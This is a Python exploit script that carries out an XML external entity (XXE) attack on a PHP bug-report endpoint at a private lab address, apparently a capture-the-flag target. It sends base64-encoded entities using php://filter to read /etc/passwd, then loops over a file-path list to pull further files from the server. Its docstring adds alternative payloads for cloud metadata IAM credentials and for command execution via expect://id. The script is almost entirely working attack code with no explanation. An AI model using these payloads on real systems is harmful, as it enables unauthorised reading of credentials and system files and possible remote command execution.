python3 xxe script

python3_xxe.py

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""XXE attack."""
from base64 import b64decode, b64encode
from urllib import parse

import bs4
import requests

# For post requests
HEADER = {
    "Content-Type": "application/x-www-form-urlencoded",
}

IP = "10.129.144.244"
URL = f"http://{IP}/tracker_diRbPr00f314.php"


def _post(param):
    job = {
        "data": param,
    }
    send = parse.urlencode(job)
    url = f"{URL}"
    return requests.post(url, headers=HEADER, data=send)


def _getfile(path):
    r"""
    <!ENTITY xxe SYSTEM "{path}" >
    <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource={path}" >
    <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/admin">
    <!ENTITY xxe SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk">
    <!ENTITY xxe SYSTEM "expect://id" >
    <title>&xxe;</title>
    """
    payload = f"""
<?xml  version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE details
  [
  <!ELEMENT bugreport ANY >
  <!ELEMENT title ANY >
  <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource={path}" >
  ]>
<bugreport>
<title>&xxe;</title>
<cwe>4444</cwe>
<cvss>10</cvss>
<reward>10</reward>
</bugreport>
""".strip()
    payload = b64encode(payload.encode())
    req = _post(payload)
    return req.text


def main():
    """Run main function."""
    path = "/etc/passwd"
    val = _getfile(path)
    obj = bs4.BeautifulSoup(val, features="lxml")
    arr = list(obj.findAll("td"))
    val = b64decode(arr[1].text)
    print(val.decode("utf-8"))
    with open("./files.txt") as fileh:
        for line in fileh.readlines():
            line = line.strip()
            val = _getfile(line)
            if len(val) == 256:
                continue
            if len(val) == 248:
                continue
            if len(val) == 2098:
                continue
            print(len(val), line)
            print(val)


if __name__ == "__main__":
    main()